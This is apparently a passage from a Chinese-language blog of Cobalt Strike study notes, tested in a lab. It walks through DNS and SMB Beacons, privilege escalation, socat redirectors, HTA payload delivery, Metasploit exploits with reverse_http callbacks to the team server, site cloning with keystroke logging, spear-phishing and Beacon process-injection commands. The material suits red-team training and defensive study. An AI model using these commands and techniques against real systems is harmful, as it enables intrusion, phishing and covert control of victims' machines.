C2配置文件，使用GET和POST的方式传输数据，不同点在于HTTPS使用了SSL，因此HTTPS Beacon就需要使用一个有效的SSL证书，具体如何配置可以参考：<a href="https://www.cobaltstrike.com/help-malleable-c2#validssl" target="_blank" rel="noopener noreferrer">https://www.cobaltstrike.com/help-malleable-c2#validssl<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <h2 id="_3、dns-beacon">3、DNS Beacon <a href="#_3、dns-beacon" class="header-anchor">#</a></h2> <p>DNS Beacon，顾名思义就是使用DNS请求将Beacon返回。这些 DNS 请求用于解析由你的 CS 团队服务器作为权威 DNS 服务器的域名。DNS 响应告诉 Beacon 休眠或是连接到团队服务器来下载任务。DNS 响应也告诉 Beacon 如何从你的团队服务器下载任务。</p> <p>在CS 4.0及之后的版本中，DNS Beacon是一个仅DNS的Payload，在这个Payload中没有HTTP通信模式，这是与之前不同的地方。</p> <blockquote><p>以上内容摘自 A-TEAM 团队的 CS 4.0 用户手册</p></blockquote> <p>DNS Beacon的工作流程具体如下：</p> <p>首先，CS服务器向目标发起攻击，将DNS Beacon传输器嵌入到目标主机内存中，然后在目标主机上的DNS Beacon传输器回连下载CS服务器上的DNS Beacon传输体，当DNS Beacon在内存中启动后就开始回连CS服务器，然后执行来自CS服务器的各种任务请求。</p> <p>原本DNS Beacon可以使用两种方式进行传输，一种是使用HTTP来下载Payload，一种是使用DNS TXT记录来下载Payload，不过现在4.0版本中，已经没有了HTTP方式，CS4.0以及未来版本都只有DNS TXT记录这一种选择了，所以接下来重点学习使用DNS TXT记录的方式。</p> <p>根据作者的介绍，DNS Beacon拥有更高的隐蔽性，但是速度相对于HTTP Beacon什么的会更慢。</p> <p><strong>域名配置</strong></p> <p>既然是配置域名，所以就需要先有个域名，这里就用我的博客域名作为示例：添加一条A记录指向CS服务器的公网IP，再添加几条ns记录指向A记录域名即可。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs6-1.png" alt=""></p> <p>添加一个监听器，DNS Hosts填写NS记录和A记录对应的名称，DNS Host填写A记录对应的名称</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs6-2.png" alt=""></p> <p>根据上一章的方法创建一个攻击脚本，放到目标主机中运行后，在CS客户端可以看到一个小黑框</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs6-3.png" alt=""></p> <p>然后经过一段时间的等待，就可以发现已经上线了</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs6-4.png" alt=""></p> <h2 id="_4、smb-beacon">4、SMB Beacon <a href="#_4、smb-beacon" class="header-anchor">#</a></h2> <p>SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信对同一台主机上的 Beacon 和跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-1.png" alt=""></p> <p>因为链接的Beacons使用Windows命名管道进行通信，此流量封装在SMB协议中，所以SMB Beacon相对隐蔽，绕防火墙时可能发挥奇效(系统防火墙默认是允许445的端口与外界通信的，其他端口可能会弹窗提醒，会导致远程命令行反弹shell失败)。</p> <p>SMB Beacon监听器对“提升权限”和“横向渗透”中很有用。</p> <p><strong>SMB Beacon 配置</strong></p> <p>首先需要一个上线的主机，这里我使用的HTTP Beacon，具体如何上线，可以参考之前第5节《如何建立Payload处理器》学习笔记中的内容，这里不过多赘述。</p> <p>主机上线后，新建一个SMB Beacon，输入监听器名称，选择Beacon SMB，管道名称可以直接默认，也可以自定义。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-2.png" alt=""></p> <p>接下来在Beacon中直接输入<code>spawn SMB</code>，这里的<code>SMB</code>指代的是创建的SMB Beacon的监听器名称，也可以直接右击session，在Spawn选项中选择刚添加的SMB Beacon。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-3.png" alt=""></p> <p>等待一会儿，就可以看到派生的SMB Beacon，在external中可以看到IP后有个<code>∞∞</code>字符。</p> <p>接下来我这里将SMB Beacon插入到进程中，以vmtoolsed进程为例。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-4.png" alt=""></p> <p>在vmtoolsed中插入SMB Beacon后，便能看到process为vmtoolsed.exe的派生SMB Beacon。</p> <p>当上线主机较多的时候，只靠列表的方式去展现，就显得不太直观了，通过CS客户端中的透视图便能很好的展现。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-5.png" alt=""></p> <p>在CS中，如果获取到目标的管理员权限，在用户名后会有<code>*</code>号标注，通过这个区别，可以判断出当前上线的test用户为普通权限用户，因此这里给他提升一下权限。</p> <p><strong>提权</strong></p> <blockquote><p>由于下面与上面内容的笔记不是在同一天写的，因此截图中上线的主机会有所差异，这里主要是记录使用的方法。</p></blockquote> <p>由于CS自带的提权方式较少，因此这里就先加载一些网上的提权脚本，脚本下载地址为：<a href="https://github.com/rsmudge/ElevateKit" target="_blank" rel="noopener noreferrer">https://github.com/rsmudge/ElevateKit<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>下载之后，打开<code>Cobalt Strike --&gt; Script Manager</code> ，之后点击<code>Load</code>，选择自己刚才下载的文件中的<code>elevate.cna</code>文件。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-6.png" alt=""></p> <p>接着选择要提权的主机，右击选择<code>Access --&gt; Elevate</code>，Listener中选择刚才新建的SMB Beacon，这里的Exploit选择了ms14-058，如果使用ms14-058不能提权，就换一个Exploit进行尝试。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-7.png" alt=""></p> <p>顺利的情况下，就可以看到提权后的管理员权限会话了，在管理员权限的会话中，不光用户名后有个*号，其Logo也是和其他会话不同的。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-8.png" alt=""></p> <p><strong>连接与断开</strong></p> <p>此时如果想断开某个会话的连接，可以使用unlink命令，比如如果想断开192.168.175.144，就可以在Beacon中输入<code>unlink 192.168.175.144</code></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs7-9.png" alt=""></p> <p>如果想再次连上，就直接输入<code>link 192.168.175.144</code>，想从当前主机连到其他主机也可以使用此命令。</p> <h2 id="_5、重定向器">5、重定向器 <a href="#_5、重定向器" class="header-anchor">#</a></h2> <p>重定向器<code>Redirectors</code>是一个位于CS团队服务器和目标网络之间的服务器，这个重定向器通俗的来说就是一个代理工具，或者说端口转发工具，担任CS服务器与目标服务器之间的跳板机角色，整体流量就像下面这样。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>目标靶机 &lt;--------&gt;多个并列的重定向器&lt;------&gt;CS服务器
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>重定向器在平时的攻击或者防御的过程中起到很重要的作用，主要有以下两点：</p> <ul><li>保护自己的CS服务器，避免目标发现自己的真实IP</li> <li>提高整体可靠性，因为可以设置多个重定向器，因此如果有个别重定向器停止工作了，整体上系统依旧是可以正常工作的</li></ul> <p><strong>创建一个重定向器</strong></p> <p>这里就使用自己的内网环境作为测试了，首先理清自己的IP</p> <p>CS服务器IP：192.168.175.129</p> <p>目标靶机IP：192.168.175.130</p> <p>重定向器IP：192.168.175.132、192.168.175.133</p> <p>首先，需要先配置重定向器的端口转发，比如这里使用HTTP Beacon，就需要将重定向器的80端口流量全部转发到CS服务器上，使用socat的命令如下：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socat TCP4-LISTEN:80,fork TCP4:192.168.175.129:80
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-7.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-6.png" alt=""></p> <p>如果提示没有socat命令，安装一下即可。重定向器设置好之后，就新建一个HTTP Beacon，并把重定向器添加到HTTP Hosts主机列表中</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-8.png" alt=""></p> <p>此时可以测试一下重定向器是否正常工作，在CS中打开 View --&gt; Web Log，之后浏览器访问CS服务器地址，也就是这里的192.168.175.129</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-9.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-10.png" alt=""></p> <p>可以看到CS是能够正常接收到流量的，说明重定向器已经配置OK了，此时按照上面创建一个HTTP Beacon的操作，创建一个HTTP Beacon，并在靶机中运行</p> <p>当靶机上线的时候，观察靶机中的流量，可以看到与靶机连接的也是重定向器的IP</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-11.png" alt=""></p> <p>在CS中也可以看到上线主机的外部IP也是重定向器的IP，此时如果关闭一个重定向器，系统依旧可以正常工作。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-12.png" alt=""></p> <p>由于笔者在学习CS过程中，所看的教程使用的是3.x版本的CS，而我使用的是4.0版本的CS。因此域名配置实操部分是自己参考网上大量文章后自己多次尝试后的结果，所以难免出现错误之处，要是表哥发现文中错误的地方，欢迎留言指正。</p> <h2 id="_6、攻击载荷安全特性">6、攻击载荷安全特性 <a href="#_6、攻击载荷安全特性" class="header-anchor">#</a></h2> <p>1、在Beacon传输Payload到目标上执行任务时都会先验证团队服务器，以确保Beacon只接受并只运行来自其团队服务器的任务，并且结果也只能发送到其团队服务器。</p> <p>2、在刚开始设置Beacon Payload时，CS会生成一个团队服务器专有的公私钥对，这个公钥嵌入在Beacon的Payload Stage中。Beacon使用团队服务器的公钥来加密传输的元数据，这个元数据中一般包含传输的进程ID、目标系统IP地址、目标主机名称等信息，这也意味着只有团队服务器才能解密这个元数据。</p> <p>3、当Beacon从团队服务器下载任务或团队服务器接收Beacon输出时，团队服务器将会使用Beacon生成的会话秘钥来加密任务并解密输出。</p> <p>4、值得注意的是，Payload Stagers 因为其体积很小，所以没有这些的安全特性。</p> <h1 id="_0x03-目标攻击">0x03 目标攻击 <a href="#_0x03-目标攻击" class="header-anchor">#</a></h1> <h2 id="_1、客户端攻击">1、客户端攻击 <a href="#_1、客户端攻击" class="header-anchor">#</a></h2> <p><strong>什么是客户端攻击</strong></p> <p>客户端攻击根据教程直译过来就是一种依靠应用程序使用控制端来进行的可视化攻击。</p> <p><code>原文：A client-side attack is an attack against an application used to view attacker controlled content.</code></p> <p><strong>为什么要进行客户端攻击</strong></p> <p>随着时代发展到了今天，在有各种WAF、防火墙的情况下，各种漏洞已经很难像过去那么好被利用了，攻击者想绕过防火墙发动攻击也不是那么容易的了。</p> <p>而当我们发送一个钓鱼文件到客户端上，再由客户端打开这个文件，最后客户端穿过防火墙回连到我们，此时在客户端上我们就获得了一个立足点<code>foothold</code>。这样的一个过程是相对而言是较为容易的，这也是为什么要进行客户端攻击。</p> <p><strong>如何获得客户端上的立足点</strong></p> <p>1、尽可能多的了解目标环境，即做好信息收集工作</p> <p>2、创建一个虚拟机，使它与目标环境尽可能的一致，比如操作系统、使用的浏览器版本等等都需要保证严格一致</p> <p>3、攻击刚刚创建的虚拟机，这会是最好的攻击目标</p> <p>4、精心策划攻击方法，达到使目标认为这些攻击行为都是正常行为的效果</p> <p>5、将精心制作的钓鱼文件发送给目标，比如钓鱼邮件</p> <p>如果这五步都非常细致精心的去准备，那么攻击成功的概率会大幅提升。</p> <h2 id="_2、系统侦察">2、系统侦察 <a href="#_2、系统侦察" class="header-anchor">#</a></h2> <p>系统侦察<code>System Profiler</code>是一个方便客户端攻击的侦察工具，这个工具将会在CS服务端上启动一个Web服务，这样当目标访问这个Web服务的时候，我们就能够看到目标使用的浏览器、操作系统等等指纹信息。</p> <p>设置系统侦察需要首先在自己的VPS服务器上运行CS服务端，之后本地客户端进行连接，选择<code>System Profiler</code>功能模块，配置待跳转的URL等信息即可。</p> <p>如果勾选了<code>Use Java Applet to get information</code>则可以发现目标的Java版本及内网IP地址，但是这样做被发现的风险就会提高，同时现在浏览器已经默认关闭了java执行权限，因此这个选项的作用也变得不大了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-1.png" alt=""></p> <p>配置完后，当用户打开配置后的链接，我们可以在三个地方进行观察</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>1、View --&gt; Applications
2、View --&gt; Web Log
3、Cobalt Strike --&gt; Visualization --&gt; Target Table
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>目标用户打开链接时，我们在CS上就能够看到目标使用的浏览器版本、系统版本等信息了，知道了版本信息，就能够进一步知道目标上可能存在什么漏洞。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-2.png" alt=""></p> <p>值得注意的一点是如果 Cobalt Strike 的 web 服务器收到了lynx、wget 或 curl 的请求，CS会自动返回一个 404 页面，这样做是为了防御蓝队的窥探。</p> <h2 id="_3、cobalt-strike-的攻击方式">3、Cobalt Strike 的攻击方式 <a href="#_3、cobalt-strike-的攻击方式" class="header-anchor">#</a></h2> <p><strong>用户驱动攻击</strong></p> <p>用户驱动攻击<code>User-Driven Attacks</code>需要欺骗用户产生交互才行，但也有许多的优点。</p> <p>首先用户驱动攻击不包含恶意攻击代码，所以用户系统上的安全补丁是没用的；其次无论目标使用什么版本的程序，我们都可以创建相应的功能来执行；最后因为用户驱动攻击十分可靠，也使得它很完美。</p> <p>当我们采取行动来追踪并需要攻击时，它就像用户本地执行程序一样，CS为我们提供了几个用户驱动攻击的选项，分别如下：</p> <h3 id="用户驱动攻击包">用户驱动攻击包 <a href="#用户驱动攻击包" class="header-anchor">#</a></h3> <p>用户驱动攻击包<code>User-Driven Attacks Packages</code>功能打开位置：<code>Attacks --&gt; Packages</code></p> <p><strong>1、HTML应用</strong></p> <p>HTML应用<code>HTML Application</code>生成(executable/VBA/powershell)这3种原理不同的VBScript实现的<code>evil.hta</code>文件。</p> <p><strong>2、Microsoft Office 宏文件</strong></p> <p>Microsoft Office 宏文件<code>Microsoft Office Document Macros</code>可以生成恶意宏放入office文件，非常经典的攻击手法。</p> <p><strong>3、Payload 生成器</strong></p> <p>Payload生成器<code>Payload Generator</code>可以生成各种语言版本的Payload，便于进行免杀。</p> <p><strong>4、Windows 可执行文件</strong></p> <p>Windows 可执行文件<code>Windows Executable</code> 会生成一个Windows可执行文件或DLL文件。默认x86，勾选x64表示包含x64 payload stage生成了artifactX64.exe(17kb) artifactX64.dll(17kb)</p> <p><strong>5、Windows 可执行文件（Stageless）</strong></p> <p>Windows 可执行文件（Stageless）<code>Windows Executable (Stageless)</code>会生成一个无进程的Windows可执行文件或DLL文件。其中的 Stageless 表示把包含payload在内的&quot;全功能&quot;被控端都放入生成的可执行文件beconX64.exe(313kb) beconX64.dll(313kb) becon.ps1(351kb)</p> <h3 id="用户驱动的web交付攻击">用户驱动的Web交付攻击 <a href="#用户驱动的web交付攻击" class="header-anchor">#</a></h3> <p>用户驱动Web交付攻击<code>User-Driven Web Drive-by Attacks</code>功能打开位置：<code>Attacks --&gt; Web Drive-by</code></p> <p><strong>1、java 签名 applet 攻击</strong></p> <p>java 签名 applet 攻击<code>Java Signed Applet Attack</code>会启动一个Web服务以提供自签名Java Applet的运行环境，浏览器会要求用户授予applet运行权限，如果用户同意则实现控制，但目前该攻击方法已过时。</p> <p><strong>2、Java 智能 Applet 攻击</strong></p> <p>Java 智能 Applet 攻击<code>Java Smart Applet Attack</code>会自动检测Java版本并利用已知的漏洞绕过安全沙箱，但CS官方称该攻击的实现已过时，在现在的环境中无效。</p> <p><strong>3、脚本化 Web 交付</strong></p> <p>脚本化 Web 交付<code>Scripted Web Delivery</code> 为payload提供web服务以便于下载和执行，类似于MSF的Script Web Delivery</p> <p><strong>4、托管文件</strong></p> <p>托管文件<code>Host File</code>通过<code>Attacks --&gt; Web Drive-by --&gt; Host File</code>进行配置，攻击者可以通过这个功能将文件上传到CS服务端上，从而进行文件托管。</p> <p>如果想删除上传到CS服务端上的文件，可以到<code>Attacks --&gt; Web Drive-by --&gt; Manage</code>下进行删除。</p> <p>如果想查看谁访问了这些文件，可以到<code>View --&gt; Web Log</code>下进行查看。</p> <h2 id="_4、开始攻击">4、开始攻击 <a href="#_4、开始攻击" class="header-anchor">#</a></h2> <h3 id="html-应用攻击">HTML 应用攻击 <a href="#html-应用攻击" class="header-anchor">#</a></h3> <p>首先来到<code>Attacks --&gt; Packages --&gt; HTML Application</code>创建一个HTML应用，如果没有创建监听的话，还需要创建一个监听。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-3.png" alt=""></p> <p>HTML应用文件生成好后，来到<code>Attacks --&gt; Web Drive-by --&gt; Host File</code>，选择刚才生成的文件，最后点击Launch，复制CS创建的链接，在目标主机上打开此链接。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-4.png" alt=""></p> <p>当在目标主机上提示是否运行时，点击运行。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-5.png" alt=""></p> <p>当该文件在目标上运行后，CS客户端上就可以看到回连的会话了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs8-6.png" alt=""></p> <h3 id="msf-与-cs-的结合利用">MSF 与 CS 的结合利用 <a href="#msf-与-cs-的结合利用" class="header-anchor">#</a></h3> <p>如果想使用MSF对目标进行漏洞利用，再通过这个漏洞来传输Beacon的话，也是可以的。</p> <p>1、首先在MSF上选择攻击模块</p> <p>2、接着在MSF上设置Payload为<code>windows/meterpreter/reverse_http</code>或者<code>windows/meterpreter/reverse_https</code>，这么做是因为CS的Beacon与MSF的分阶段协议是相兼容的。</p> <p>3、之后在MSF中设置Payload的LHOST、LPORT为CS中Beacon的监听器IP及端口。</p> <p>4、然后设置 <code>DisablePayloadHandler</code> 为 True，此选项会让 MSF 避免在其内起一个 handler 来服务你的 payload 连接，也就是告诉MSF说我们已经建立了监听器，不必再新建监听器了。</p> <p>5、再设置 <code>PrependMigrate</code> 为 True，此选项让 MSF 前置 shellcode 在另一个进程中运行 payload stager。如果被利用的应用程序崩溃或被用户关闭，这会帮助 Beacon 会话存活。</p> <p>6、最后运行<code>exploit -j</code>，-j 是指作为job开始运行，即在后台运行。</p> <p><strong>操作</strong></p> <p>在CS中新建一个HTTP Beacon，创建过程不再赘述。</p> <p>1、在MSF中选择攻击模块，根据教程这里选择的<code>adobe_flash_hacking_team_uaf</code>模块，不过个人感觉现在这个模块已经不太能被利用成功了。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use exploit/multi/browser/adobe_flash_hacking_team_uaf
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>2、接着配置payload，这里选择revese_http payload</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>set payload windows/meterpreter/revese_http
set LHOST cs_server_ip
set LPORT 80
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>3、之后，配置<code>DisablePayloadHandler</code>、<code>PrependMigrate</code>为 True</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>set DisablePayloadHandler True
set PrependMigrate True
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>4、最后，开始攻击。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>exploit -j
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs9-1.png" alt=""></p> <h3 id="伪装-克隆网站">伪装—克隆网站 <a href="#伪装-克隆网站" class="header-anchor">#</a></h3> <p>在向目标发送漏洞程序之前，我们将自己进行伪装一下，这样可以更好的保护自己，同时提高成功率。CS上有个克隆网站的功能，能够较好的帮助到我们。</p> <p>首先，来到<code>Attacks --&gt; Web Drive-by --&gt; Clone Site</code>下，打开克隆网站的功能，之后写入待克隆网站的URL，在Attack中写入MSF中生成的URL。</p> <p>其中<code>Log keystrokes on cloned site</code>选项如果勾选则可以获取目标的键盘记录，记录结果在Web Log中能够查看。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs9-2.png" alt=""></p> <p>之后，浏览器打开克隆站点地址，如果目标存在漏洞，就可以被利用了，同时在CS中也会观察到主机上线。</p> <h2 id="_5、鱼叉式网络钓鱼">5、鱼叉式网络钓鱼 <a href="#_5、鱼叉式网络钓鱼" class="header-anchor">#</a></h2> <p>用CS进行钓鱼需要四个步骤：</p> <p>1、创建一个目标清单</p> <p>2、制作一个邮件模板或者使用之前制作好的模板</p> <p>3、选择一个用来发送邮件的邮件服务器</p> <p>4、发送邮件</p> <p><strong>目标清单</strong></p> <p>目标清单就是每行一个邮件地址的txt文件，即每行包含一个目标。</p> <p>在一行中除了邮件地址也可以使用标签或一个名字。如果提供了名称，则有助于 Cobalt Strike 自定义每个网络钓鱼。</p> <p>这里使用一些在线邮件接收平台的邮箱地址作为示例。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>astrqb79501@chacuo.net	test1
gswtdm26180@chacuo.net	test2
ypmgin95416@chacuo.net	test3
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>将以上内容保存为txt文本文件，就创建好了自己的目标清单。</p> <p><strong>模板</strong></p> <p>使用模板的好处在于可以重复利用，制作钓鱼模板也很简单。</p> <p>首先可以自己写一封邮件发给自己，或者直接从自己收件箱挑选一个合适的。有了合适的邮件之后，查看邮件原始信息，一般在邮件的选项里能找到这个功能。最后将邮件的原始信息保存为文件，一个模板就制作完成了。</p> <p><strong>发送邮件</strong></p> <p>有了目标和模板，然后选好自己的邮件服务器，之后就可以发送消息了。</p> <p>在CS客户端中，点击<code>Attacks --&gt; Spear Phish</code>即可打开网络钓鱼模块。添加上目标、模板、钓鱼地址、邮箱服务、退回邮箱，其中Bounce To为退回邮件接收地址，注意要和配置邮件服务器时填的邮箱一致，否则会报错。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs9-3.png" alt=""></p> <p>所有信息添加完成后，可以点击Preview查看。如果感觉效果不错，就可以点击send发送了。</p> <p>当目标收到钓鱼邮件，并且点击钓鱼邮件中的链接后，如果钓鱼链接配置的没有问题，CS就能够上线了。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs9-4.png" alt=""></p> <p>由于此处是仅作为测试用途，所以模板中的链接都是自己的本地内网CS服务器地址，如果是真实环境中，则自然需要使用公网的地址才行。</p> <p>在真实环境中的钓鱼邮件也不会像这里这么浮夸，真实环境中的钓鱼邮件往往都伪装成和正经儿的邮件一模一样，单从表面上看很难看出区别，因此提高自己的安全意识还是很重要滴。</p> <h1 id="_0x04-后渗透">0x04 后渗透 <a href="#_0x04-后渗透" class="header-anchor">#</a></h1> <h2 id="_1、beacon-的管理">1、Beacon 的管理 <a href="#_1、beacon-的管理" class="header-anchor">#</a></h2> <p><strong>Beacon 控制台</strong></p> <p>在一个 Beacon 会话上右击 <code>interact</code>（交互）即可打开 Beacon 控制台，如果想对多个会话进行控制，也只需选中多个会话，执行相关功能即可。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs10-1.png" alt=""></p> <p>在 Beacon 的控制台中的输入与输出之间，是一个状态栏，状态栏上的信息分别是：目标 NetBIOS 名称、用户名、会话PID以及 Beacon 最近一次连接到 CS 团队服务器的时间。</p> <p>Beacon 控制台是在使用 CS 的过程中，很经常用到的功能，向 Beacon 发出的每个命令，都可以在这里看到，如果队友发送了消息，在 Beacon 控制台同样能看到，消息前还会显示队友的名称。</p> <p><strong>Beacon 菜单</strong></p> <p>Access：包含了一些对凭据的操作及提权的选项</p> <p>Explore：包含了信息探测与目标交互的选项</p> <p>Pivoting：包含了一些设置代理隧道的选项</p> <p>Session：包含了对当前 Beacon 会话管理的选项</p> <p><strong>Beacon 命令</strong></p> <p>help：查看 Beacon 命令的帮助信息。使用 help + 待查看帮助的命令可查看该命令的帮助信息。</p> <p>clear：清除 Beacon 命令队列。Beacon 是一个异步的 Payload，输入的命令并不会立即执行，而是当 Beacon 连接到团队服务器时再一一执行命令，因此当需要清除队列命令时就可以使用 clear 命令。</p> <p>sleep：改变 Beacon 的休眠时间。输入 <code>sleep 30</code>表示休眠30秒；输入<code>sleep 60 50</code>表示，随机睡眠 30秒至60秒，其中30秒 = 60 x 50%；如果输入 <code>sleep 0</code>则表示进入交互模式，任何输入的命令都会被立即执行，当输入一些命令，比如<code>desktop</code>时， Beacon 会自动进入交互模式。</p> <p>shell：通过受害主机的 cmd.exe 执行命令。比如运行<code>ipconfig</code>，就需要输入<code>shell ipconfig</code></p> <p>run：不使用 cmd.exe 执行命令。该命令也是 run + 命令的形式运行，该命令会将执行结果回显。</p> <p>execute：执行命令，但不回显结果。</p> <p>cd：切换当前工作目录。</p> <p>pwd：查看当前所在目录。</p> <p>powershell：通过受害主机的 PowerShell 执行命令。比如想在 PowerShell 下运行 <code>ipconfig</code>，就需要输入<code>powershell ipconfig</code></p> <p>powerpick：不使用 powershell.exe 执行 powershell 命令。这个命令依赖于由 Lee Christensen 开发的非托管 PowerShell 技术。powershell 和 powerpick 命令会使用当前令牌（ token ）。</p> <p>psinject：将非托管的 PowerShell 注入到一个特定的进程中并从此位置运行命令。</p> <p>powershell-import：导入 PowerShell 脚本到 Beacon 中。直接运行 powershell-import + 脚本文件路径即可，但是这个脚本导入命令一次仅能保留一个 PowerShell 脚本，再导入一个新脚本的时候，上一个脚本就被覆盖了，因此可以通过导入一个空文件来清空 Beacon 中导入的脚本。</p> <p>powershell get-help：获取 PowerShell 命令的相关帮助信息。比如想获取 PowerShell 下 get-process 命令的帮助，就需要输入<code>powershell get-help get-process</code></p> <p>execute-assembly：将一个本地的 .NET 可执行文件作为 Beacon 的后渗透任务来运行。</p> <p>setenv：设置一个环境变量。</p> <h2 id="_2、会话传递">2、会话传递 <a href="#_2、会话传递" class="header-anchor">#</a></h2> <p><strong>会话传递相关命令</strong></p> <p>Beacon 被设计的最初目的就是向其他的 CS 监听器传递会话。</p> <p><code>spawn</code>：进行会话的传递，也可直接右击会话选择<code>spawn</code>命令进行会话的选择。默认情况下，<code>spawn</code>命令会在 rundll32.exe 中派生一个会话。为了更好的隐蔽性，可以找到更合适的程序（如 Internet Explorer） 并使用<code>spawnto</code>命令来说明在派生新会话时候会使用 Beacon 中的哪个程序。</p> <p><code>spawnto</code>：该命令会要求指明架构（x86 还是 x64）和用于派生会话的程序的完整路径。单独输入<code>spawnto</code>命令然后按 enter 会指示 Beacon 恢复至其默认行为。</p> <p><code>inject</code>：输入<code>inject + 进程 id + 监听器名</code>来把一个会话注入一个特定的进程中。使用 ps 命令来获取一个当前系统上的进程列表。使用<code>inject [pid] x64</code>来将一个64位 Beacon 注入到一个 64位进程中。</p> <p><code>spawn</code>和<code>inject</code>命令都将一个 payload stage 注入进内存中。如果 payload stage 是 HTTP、HTTPS 或 DNS Beacon 并且它无法连接到你，那么将看不到一个会话。如果 payload stage 是一个绑定的 TCP 或 SMB 的 Beacon，这些命令会自动地尝试连接到并控制这些 payload。</p> <p><code>dllinject</code>：<code>dllinject + [pid]</code>来将一个反射性 DLL 注入到一个进程中。</p> <p><code>shinject</code>：使用<code>shinject [pid] [架构] [/路径/.../file.bin]</code>命令来从一个本地文件中注入 shellcode 到一个目标上的进程中。</p> <p><code>shspawn</code>：使用<code>shspawn [架构] [/路径/.../file.bin]</code>命令会先派生一个新进程（这个新进程是 spawn to 命令指定的可执行文件），然后把指定的 shellcode 文件（ file.bin ）注入到这个进程中。</p> <p><code>dllload</code>：使用<code>dllload [pid] [c:\路径\...\file.dll]</code>来在另一个进程中加载磁盘上的 DLL文件。</p> <p><strong>会话传递使用场景</strong></p> <p>1、将当前会话传递至其他CS团队服务器中，直接右击<code>spawn</code>选择要传递的监听器即可。</p> <p>2、将当前会话传递至MSF中，这里简单做一下演示。</p> <p>首先，在MSF中，为攻击载荷新建一个payload</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>msf5 &gt; use exploit/multi/handler
msf5 exploit(multi/handler) &gt; set payload windows/meterpreter/reverse_https
msf5 exploit(multi/handler) &gt; set lhost 192.168.175.156
msf5 exploit(multi/handler) &gt; set lport 443
msf5 exploit(multi/handler) &gt; exploit -j
